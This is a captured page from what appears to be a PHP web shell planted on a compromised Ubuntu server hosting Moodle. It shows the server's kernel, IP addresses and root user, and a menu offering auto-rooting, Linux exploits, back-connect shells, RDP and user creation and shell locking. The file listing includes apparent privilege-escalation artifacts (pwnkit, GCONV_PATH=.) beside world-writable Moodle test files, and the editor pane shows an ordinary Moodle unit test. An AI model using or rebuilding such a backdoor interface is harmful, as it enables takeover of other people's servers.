Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
behat
[ DIR ]
drwxrwxrwx
fixtures
[ DIR ]
drwxrwxrwx
other
[ DIR ]
drwxrwxrwx
performance
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
accesslib_test.php
121.33
KB
-rwxrwxrwx
admintree_test.php
4.01
KB
-rwxrwxrwx
authlib_test.php
6.87
KB
-rwxrwxrwx
blocklib_test.php
13.18
KB
-rwxrwxrwx
code_test.php
2.89
KB
-rwxrwxrwx
completionlib_advanced_test.ph...
4.3
KB
-rwxrwxrwx
completionlib_test.php
29.62
KB
-rwxrwxrwx
componentlib_test.php
6.62
KB
-rwxrwxrwx
conditionlib_test.php
33.62
KB
-rwxrwxrwx
configonlylib_test.php
5.62
KB
-rwxrwxrwx
coursecatlib_test.php
27.33
KB
-rwxrwxrwx
csslib_test.php
54.76
KB
-rwxrwxrwx
csvclass_test.php
5.53
KB
-rwxrwxrwx
datalib_test.php
12.26
KB
-rwxrwxrwx
environment_test.php
1.57
KB
-rwxrwxrwx
eventslib_test.php
7.97
KB
-rwxrwxrwx
externallib_test.php
6.19
KB
-rwxrwxrwx
filelib_test.php
14.51
KB
-rwxrwxrwx
filter_test.php
26.7
KB
-rwxrwxrwx
formslib_test.php
28.63
KB
-rwxrwxrwx
gradelib_test.php
2.03
KB
-rwxrwxrwx
grouplib_test.php
18.92
KB
-rwxrwxrwx
html2text_test.php
6.15
KB
-rwxrwxrwx
htmlpurifier_test.php
9.8
KB
-rwxrwxrwx
htmlwriter_test.php
6.3
KB
-rwxrwxrwx
markdown_test.php
2.21
KB
-rwxrwxrwx
mathslib_test.php
8.21
KB
-rwxrwxrwx
medialib_test.php
23.77
KB
-rwxrwxrwx
messagelib_test.php
7.46
KB
-rwxrwxrwx
modinfolib_test.php
8.07
KB
-rwxrwxrwx
moodlelib_test.php
123.49
KB
-rwxrwxrwx
navigationlib_test.php
24.21
KB
-rwxrwxrwx
outputcomponents_test.php
18.2
KB
-rwxrwxrwx
outputlib_test.php
8.9
KB
-rwxrwxrwx
outputrequirementslib_test.php
1.71
KB
-rwxrwxrwx
pagelib_test.php
22.8
KB
-rwxrwxrwx
pluginlib_test.php
37.15
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
questionlib_test.php
3.1
KB
-rwxrwxrwx
rsslib_test.php
7.12
KB
-rwxrwxrwx
setuplib_test.php
5.73
KB
-rwxrwxrwx
statslib_test.php
19.13
KB
-rwxrwxrwx
string_test.php
4.21
KB
-rwxrwxrwx
textlib_test.php
24.62
KB
-rwxrwxrwx
upgradelib_test.php
1.47
KB
-rwxrwxrwx
weblib_test.php
16.3
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : outputcomponents_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Unit tests for lib/outputcomponents.php. * * @package core * @category phpunit * @copyright 2011 David Mudrak <david@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); global $CFG; require_once($CFG->libdir . '/outputcomponents.php'); /** * Unit tests for the user_picture class */ class outputcomponents_testcase extends advanced_testcase { public function test_fields_aliasing() { $fields = user_picture::fields(); $fields = array_map('trim', explode(',', $fields)); $this->assertTrue(in_array('id', $fields)); $aliased = array(); foreach ($fields as $field) { if ($field === 'id') { $aliased['id'] = 'aliasedid'; } else { $aliased[$field] = 'prefix'.$field; } } $returned = user_picture::fields('', array('custom1', 'id'), 'aliasedid', 'prefix'); $returned = array_map('trim', explode(',', $returned)); $this->assertEquals(count($returned), count($fields) + 1); // only one extra field added foreach ($fields as $field) { if ($field === 'id') { $expected = "id AS aliasedid"; } else { $expected = "$field AS prefix$field"; } $this->assertTrue(in_array($expected, $returned), "Expected pattern '$expected' not returned"); } $this->assertTrue(in_array("custom1 AS prefixcustom1", $returned), "Expected pattern 'custom1 AS prefixcustom1' not returned"); } public function test_fields_unaliasing() { $fields = user_picture::fields(); $fields = array_map('trim', explode(',', $fields)); $fakerecord = new stdClass(); $fakerecord->aliasedid = 42; foreach ($fields as $field) { if ($field !== 'id') { $fakerecord->{'prefix'.$field} = "Value of $field"; } } $fakerecord->prefixcustom1 = 'Value of custom1'; $returned = user_picture::unalias($fakerecord, array('custom1'), 'aliasedid', 'prefix'); $this->assertEquals($returned->id, 42); foreach ($fields as $field) { if ($field !== 'id') { $this->assertEquals($returned->{$field}, "Value of $field"); } } $this->assertEquals($returned->custom1, 'Value of custom1'); } public function test_fields_unaliasing_null() { $fields = user_picture::fields(); $fields = array_map('trim', explode(',', $fields)); $fakerecord = new stdClass(); $fakerecord->aliasedid = 42; foreach ($fields as $field) { if ($field !== 'id') { $fakerecord->{'prefix'.$field} = "Value of $field"; } } $fakerecord->prefixcustom1 = 'Value of custom1'; $fakerecord->prefiximagealt = null; $returned = user_picture::unalias($fakerecord, array('custom1'), 'aliasedid', 'prefix'); $this->assertEquals($returned->id, 42); $this->assertEquals($returned->imagealt, null); foreach ($fields as $field) { if ($field !== 'id' and $field !== 'imagealt') { $this->assertEquals($returned->{$field}, "Value of $field"); } } $this->assertEquals($returned->custom1, 'Value of custom1'); } public function test_get_url() { global $DB, $CFG; $this->resetAfterTest(); // Force SVG on so that we have predictable URL's. $CFG->svgicons = true; // verify new install contains expected defaults $this->assertEquals('standard', $CFG->theme); $this->assertEquals(1, $CFG->slasharguments); $this->assertEquals(1, $CFG->themerev); $this->assertEquals(0, $CFG->themedesignermode); $this->assertEquals('http://www.example.com/moodle', $CFG->wwwroot); $this->assertEquals($CFG->wwwroot, $CFG->httpswwwroot); $this->assertEquals(0, $CFG->enablegravatar); $this->assertEquals('mm', $CFG->gravatardefaulturl); // create some users $page = new moodle_page(); $page->set_url('/user/profile.php'); $page->set_context(context_system::instance()); $renderer = $page->get_renderer('core'); $user1 = $this->getDataGenerator()->create_user(array('picture'=>11, 'email'=>'user1@example.com')); $context1 = context_user::instance($user1->id); $user2 = $this->getDataGenerator()->create_user(array('picture'=>0, 'email'=>'user2@example.com')); $context2 = context_user::instance($user2->id); $user3 = $this->getDataGenerator()->create_user(array('picture'=>1, 'deleted'=>1, 'email'=>'user3@example.com')); $context3 = context_user::instance($user3->id, IGNORE_MISSING); $this->assertEquals($user3->picture, 0); $this->assertNotEquals($user3->email, 'user3@example.com'); $this->assertFalse($context3); // try legacy picture == 1 $user1->picture = 1; $up1 = new user_picture($user1); $this->assertEquals($CFG->wwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/standard/f2?rev=1', $up1->get_url($page, $renderer)->out(false)); $user1->picture = 11; // try valid user with picture when user context is not cached - 1 query expected context_helper::reset_caches(); $reads = $DB->perf_get_reads(); $up1 = new user_picture($user1); $this->assertEquals($reads, $DB->perf_get_reads()); $this->assertEquals($CFG->wwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/standard/f2?rev=11', $up1->get_url($page, $renderer)->out(false)); $this->assertEquals($reads+1, $DB->perf_get_reads()); // try valid user with contextid hint - no queries expected $user1->contextid = $context1->id; context_helper::reset_caches(); $reads = $DB->perf_get_reads(); $up1 = new user_picture($user1); $this->assertEquals($reads, $DB->perf_get_reads()); $this->assertEquals($CFG->wwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/standard/f2?rev=11', $up1->get_url($page, $renderer)->out(false)); $this->assertEquals($reads, $DB->perf_get_reads()); // try valid user without image - no queries expected context_helper::reset_caches(); $reads = $DB->perf_get_reads(); $up2 = new user_picture($user2); $this->assertEquals($reads, $DB->perf_get_reads()); $this->assertEquals($CFG->wwwroot.'/theme/image.php/standard/core/1/u/f2', $up2->get_url($page, $renderer)->out(false)); $this->assertEquals($reads, $DB->perf_get_reads()); // try guessing of deleted users - no queries expected unset($user3->deleted); context_helper::reset_caches(); $reads = $DB->perf_get_reads(); $up3 = new user_picture($user3); $this->assertEquals($reads, $DB->perf_get_reads()); $this->assertEquals($CFG->wwwroot.'/theme/image.php/standard/core/1/u/f2', $up3->get_url($page, $renderer)->out(false)); $this->assertEquals($reads, $DB->perf_get_reads()); // try incorrectly deleted users (with valid email and pciture flag) - some DB reads expected $user3->email = 'user3@example.com'; $user3->picture = 1; $reads = $DB->perf_get_reads(); $up3 = new user_picture($user3); $this->assertEquals($reads, $DB->perf_get_reads()); $this->assertEquals($CFG->wwwroot.'/theme/image.php/standard/core/1/u/f2', $up3->get_url($page, $renderer)->out(false)); $this->assertTrue($reads < $DB->perf_get_reads()); // test gravatar set_config('enablegravatar', 1); // deleted user can not have gravatar $user3->email = 'deleted'; $user3->picture = 0; $up3 = new user_picture($user3); $this->assertEquals($CFG->wwwroot.'/theme/image.php/standard/core/1/u/f2', $up3->get_url($page, $renderer)->out(false)); // verify defaults to misteryman (mm) $up2 = new user_picture($user2); $this->assertEquals('http://www.gravatar.com/avatar/ab53a2911ddf9b4817ac01ddcd3d975f?s=35&d=mm', $up2->get_url($page, $renderer)->out(false)); // without gravatardefaulturl, verify we pick own file set_config('gravatardefaulturl', ''); $up2 = new user_picture($user2); $this->assertEquals('http://www.gravatar.com/avatar/ab53a2911ddf9b4817ac01ddcd3d975f?s=35&d=http%3A%2F%2Fwww.example.com%2Fmoodle%2Fpix%2Fu%2Ff2.png', $up2->get_url($page, $renderer)->out(false)); // uploaded image takes precedence before gravatar $up1 = new user_picture($user1); $this->assertEquals($CFG->wwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/standard/f2?rev=11', $up1->get_url($page, $renderer)->out(false)); // https version $CFG->httpswwwroot = str_replace('http:', 'https:', $CFG->wwwroot); $up1 = new user_picture($user1); $this->assertEquals($CFG->httpswwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/standard/f2?rev=11', $up1->get_url($page, $renderer)->out(false)); $up3 = new user_picture($user3); $this->assertEquals($CFG->httpswwwroot.'/theme/image.php/standard/core/1/u/f2', $up3->get_url($page, $renderer)->out(false)); $up2 = new user_picture($user2); $this->assertEquals('https://secure.gravatar.com/avatar/ab53a2911ddf9b4817ac01ddcd3d975f?s=35&d=https%3A%2F%2Fwww.example.com%2Fmoodle%2Fpix%2Fu%2Ff2.png', $up2->get_url($page, $renderer)->out(false)); // now test gravatar with one theme having own images (afterburner) $CFG->httpswwwroot = $CFG->wwwroot; $this->assertTrue(file_exists("$CFG->dirroot/theme/afterburner/config.php")); set_config('theme', 'afterburner'); $page = new moodle_page(); $page->set_url('/user/profile.php'); $page->set_context(context_system::instance()); $renderer = $page->get_renderer('core'); $up2 = new user_picture($user2); $this->assertEquals('http://www.gravatar.com/avatar/ab53a2911ddf9b4817ac01ddcd3d975f?s=35&d=http%3A%2F%2Fwww.example.com%2Fmoodle%2Ftheme%2Fafterburner%2Fpix_core%2Fu%2Ff2.png', $up2->get_url($page, $renderer)->out(false)); // https version $CFG->httpswwwroot = str_replace('http:', 'https:', $CFG->wwwroot); $up2 = new user_picture($user2); $this->assertEquals('https://secure.gravatar.com/avatar/ab53a2911ddf9b4817ac01ddcd3d975f?s=35&d=https%3A%2F%2Fwww.example.com%2Fmoodle%2Ftheme%2Fafterburner%2Fpix_core%2Fu%2Ff2.png', $up2->get_url($page, $renderer)->out(false)); // end of gravatar tests // test themed images set_config('enablegravatar', 0); $this->assertTrue(file_exists("$CFG->dirroot/theme/formal_white/config.php")); // use any other theme set_config('theme', 'formal_white'); $CFG->httpswwwroot = $CFG->wwwroot; $page = new moodle_page(); $page->set_url('/user/profile.php'); $page->set_context(context_system::instance()); $renderer = $page->get_renderer('core'); $up1 = new user_picture($user1); $this->assertEquals($CFG->wwwroot.'/pluginfile.php/'.$context1->id.'/user/icon/formal_white/f2?rev=11', $up1->get_url($page, $renderer)->out(false)); $up2 = new user_picture($user2); $this->assertEquals($CFG->wwwroot.'/theme/image.php/formal_white/core/1/u/f2', $up2->get_url($page, $renderer)->out(false)); // test non-slashargument images set_config('theme', 'standard'); $CFG->httpswwwroot = $CFG->wwwroot; $CFG->slasharguments = 0; $page = new moodle_page(); $page->set_url('/user/profile.php'); $page->set_context(context_system::instance()); $renderer = $page->get_renderer('core'); $up3 = new user_picture($user3); $this->assertEquals($CFG->wwwroot.'/theme/image.php?theme=standard&component=core&rev=1&image=u%2Ff2', $up3->get_url($page, $renderer)->out(false)); } public function test_empty_menu() { $emptymenu = new custom_menu(); $this->assertTrue($emptymenu instanceof custom_menu); $this->assertFalse($emptymenu->has_children()); } public function test_basic_syntax() { $definition = <<<EOF Moodle community|http://moodle.org -Moodle free support|http://moodle.org/support -Moodle development|http://moodle.org/development --Moodle Tracker|http://tracker.moodle.org --Moodle Docs|http://docs.moodle.org -Moodle News|http://moodle.org/news Moodle company -Hosting|http://moodle.com/hosting|Commercial hosting -Support|http://moodle.com/support|Commercial support EOF; $menu = new custom_menu($definition); $this->assertTrue($menu instanceof custom_menu); $this->assertTrue($menu->has_children()); $firstlevel = $menu->get_children(); $this->assertTrue(is_array($firstlevel)); $this->assertEquals(2, count($firstlevel)); $item = array_shift($firstlevel); $this->assertTrue($item instanceof custom_menu_item); $this->assertTrue($item->has_children()); $this->assertEquals(3, count($item->get_children())); $this->assertEquals('Moodle community', $item->get_text()); $itemurl = $item->get_url(); $this->assertTrue($itemurl instanceof moodle_url); $this->assertEquals('http://moodle.org', $itemurl->out()); $this->assertEquals($item->get_text(), $item->get_title()); // implicit title $item = array_shift($firstlevel); $this->assertTrue($item->has_children()); $this->assertEquals(2, count($item->get_children())); $this->assertEquals('Moodle company', $item->get_text()); $this->assertTrue(is_null($item->get_url())); $children = $item->get_children(); $subitem = array_shift($children); $this->assertFalse($subitem->has_children()); $this->assertEquals('Hosting', $subitem->get_text()); $this->assertEquals('Commercial hosting', $subitem->get_title()); } public function test_multilang_support() { $definition = <<<EOF Start|http://school.info Info -English|http://school.info/en|Information in English|en -Deutsch|http://school.info/de|Informationen in deutscher Sprache|de,de_du,de_kids EOF; // the menu without multilang support $menu = new custom_menu($definition); $this->assertTrue($menu->has_children()); $this->assertEquals(2, count($menu->get_children())); $children = $menu->get_children(); $infomenu = array_pop($children); $this->assertTrue($infomenu->has_children()); $children = $infomenu->get_children(); $this->assertEquals(2, count($children)); $children = $infomenu->get_children(); $langspecinfo = array_shift($children); $this->assertEquals('Information in English', $langspecinfo->get_title()); // same menu for English language selected $menu = new custom_menu($definition, 'en'); $this->assertTrue($menu->has_children()); $this->assertEquals(2, count($menu->get_children())); $children = $menu->get_children(); $infomenu = array_pop($children); $this->assertTrue($infomenu->has_children()); $this->assertEquals(1, count($infomenu->get_children())); $children = $infomenu->get_children(); $langspecinfo = array_shift($children); $this->assertEquals('Information in English', $langspecinfo->get_title()); // same menu for German (de_du) language selected $menu = new custom_menu($definition, 'de_du'); $this->assertTrue($menu->has_children()); $this->assertEquals(2, count($menu->get_children())); $children = $menu->get_children(); $infomenu = array_pop($children); $this->assertTrue($infomenu->has_children()); $this->assertEquals(1, count($infomenu->get_children())); $children = $infomenu->get_children(); $langspecinfo = array_shift($children); $this->assertEquals('Informationen in deutscher Sprache', $langspecinfo->get_title()); // same menu for Czech language selected $menu = new custom_menu($definition, 'cs'); $this->assertTrue($menu->has_children()); $this->assertEquals(2, count($menu->get_children())); $children = $infomenu->get_children(); $infomenu = array_pop( $children); $this->assertFalse($infomenu->has_children()); } public function test_prepare() { $expecteda = array('1', '<a href="index.php?page=1">2</a>', '<a href="index.php?page=2">3</a>', '<a href="index.php?page=3">4</a>', '<a href="index.php?page=4">5</a>', '<a href="index.php?page=5">6</a>', '<a href="index.php?page=6">7</a>', '<a href="index.php?page=7">8</a>', ); $expectedb = array('<a href="page?page=3">4</a>', '<a href="page?page=4">5</a>', '6', '<a href="page?page=6">7</a>', '<a href="page?page=7">8</a>', ); $mpage = new moodle_page(); $rbase = new renderer_base($mpage, "/"); $pbara = new paging_bar(40, 0, 5, 'index.php'); $pbara->prepare($rbase,$mpage, "/"); $pbarb = new paging_bar(100, 5, 5, 'page'); $pbarb->maxdisplay = 5; $pbarb->prepare($rbase,$mpage,"/"); $this->assertEquals($pbara->pagelinks, $expecteda); $this->assertEquals($pbarb->pagelinks, $expectedb); } }
Close